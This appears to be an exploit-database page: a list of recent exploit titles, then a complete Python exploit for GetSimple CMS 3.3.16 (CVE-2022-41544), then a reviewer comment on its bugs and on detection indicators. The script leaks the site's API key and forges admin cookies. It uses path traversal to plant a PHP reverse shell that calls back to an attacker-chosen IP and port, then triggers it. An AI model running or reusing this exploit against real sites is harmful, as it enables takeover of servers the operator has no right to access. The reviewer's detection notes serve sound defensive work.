
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend 
Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
|
|
# Data: 18/5/2023
|
|
# Exploit Author : Youssef Muhammad
|
|
# Vendor: Get-simple
|
|
# Software Link:
|
|
# Version app: 3.3.16
|
|
# Tested on: linux
|
|
# CVE: CVE-2022-41544
|
|
|
|
import sys
|
|
import hashlib
|
|
import re
|
|
import requests
|
|
from xml.etree import ElementTree
|
|
from threading import Thread
|
|
import telnetlib
|
|
|
|
purple = "\033[0;35m"
|
|
reset = "\033[0m"
|
|
yellow = "\033[93m"
|
|
blue = "\033[34m"
|
|
red = "\033[0;31m"
|
|
|
|
def print_the_banner():
|
|
print(purple + '''
|
|
CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4
|
|
C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4
|
|
C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444
|
|
C V V E 2 00 0 2 2 4 11 5 4 4
|
|
CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4
|
|
'''+ reset)
|
|
|
|
def get_version(target, path):
|
|
r = requests.get(f"http://{target}{path}admin/index.php")
|
|
match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)
|
|
if match:
|
|
version = match.group(1)
|
|
if version <= "3.3.16":
|
|
print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
|
|
else:
|
|
print ("This is not vulnrable to this CVE")
|
|
return version
|
|
return None
|
|
|
|
def api_leak(target, path):
|
|
r = requests.get(f"http://{target}{path}data/other/authorization.xml")
|
|
if r.ok:
|
|
tree = ElementTree.fromstring(r.content)
|
|
apikey = tree[0].text
|
|
print(f"[+] apikey obtained {apikey}")
|
|
return apikey
|
|
return None
|
|
|
|
def set_cookies(username, version, apikey):
|
|
cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
|
|
cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
|
|
cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
|
|
headers = {
|
|
'Content-Type':'application/x-www-form-urlencoded',
|
|
'Cookie': cookies
|
|
}
|
|
return headers
|
|
|
|
def get_csrf_token(target, path, headers):
|
|
r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
|
|
m = re.search('nonce" type="hidden" value="(.*)"', r.text)
|
|
if m:
|
|
print("[+] csrf token obtained")
|
|
return m.group(1)
|
|
return None
|
|
|
|
def upload_shell(target, path, headers, nonce, shell_content):
|
|
upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
|
|
payload = {
|
|
'content': shell_content,
|
|
'edited_file': '../shell.php',
|
|
'nonce': nonce,
|
|
'submitsave': 1
|
|
}
|
|
try:
|
|
response = requests.post(upload_url, headers=headers, data=payload)
|
|
if response.status_code == 200:
|
|
print("[+] Shell uploaded successfully!")
|
|
else:
|
|
print("(-) Shell upload failed!")
|
|
except requests.exceptions.RequestException as e:
|
|
print("(-) An error occurred while uploading the shell:", e)
|
|
def shell_trigger(target, path):
|
|
url = f"http://{target}{path}/shell.php"
|
|
try:
|
|
response = requests.get(url)
|
|
if response.status_code == 200:
|
|
print("[+] Webshell trigged successfully!")
|
|
else:
|
|
print("(-) Failed to visit the page!")
|
|
except requests.exceptions.RequestException as e:
|
|
print("(-) An error occurred while visiting the page:", e)
|
|
|
|
def main():
|
|
if len(sys.argv) != 5:
|
|
print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
|
|
return
|
|
|
|
target = sys.argv[1]
|
|
path = sys.argv[2]
|
|
if not path.endswith('/'):
|
|
path += '/'
|
|
|
|
ip, port = sys.argv[3].split(':')
|
|
username = sys.argv[4]
|
|
shell_content = f"""<?php
|
|
$ip = '{ip}';
|
|
$port = {port};
|
|
$sock = fsockopen($ip, $port);
|
|
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
|
|
"""
|
|
|
|
version = get_version(target, path)
|
|
if not version:
|
|
print("(-) could not get version")
|
|
return
|
|
|
|
apikey = api_leak(target, path)
|
|
if not apikey:
|
|
print("(-) could not get apikey")
|
|
return
|
|
|
|
headers = set_cookies(username, version, apikey)
|
|
|
|
nonce = get_csrf_token(target, path, headers)
|
|
if not nonce:
|
|
print("(-) could not get nonce")
|
|
return
|
|
|
|
upload_shell(target, path, headers, nonce, shell_content)
|
|
shell_trigger(target, path)
|
|
|
|
if __name__ == '__main__':
|
|
print_the_banner()
|
|
main() |
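Review bot: `telnetlib` and `Thread` are imported at the top of the file but never referenced anywhere in it, and `telnetlib` was deprecated in Python 3.11 and removed in 3.13, so the script fails at import on current interpreters; drop `import telnetlib` and `from threading import Thread`. The header comment has `# Data: 18/5/2023` where `# Date:` is evidently meant, and `# Software Link:` is left empty. In get_version, `version <= "3.3.16"` is a lexicographic string comparison, so a reported `3.3.9` sorts after `3.3.16` and the printed "is vulnrable" verdict does not match what the check actually tests. From a defensive standpoint the file's own requests show what to alert on: an unauthenticated GET of `data/other/authorization.xml` and a POST to `admin/theme-edit.php` whose `edited_file` value contains `../`.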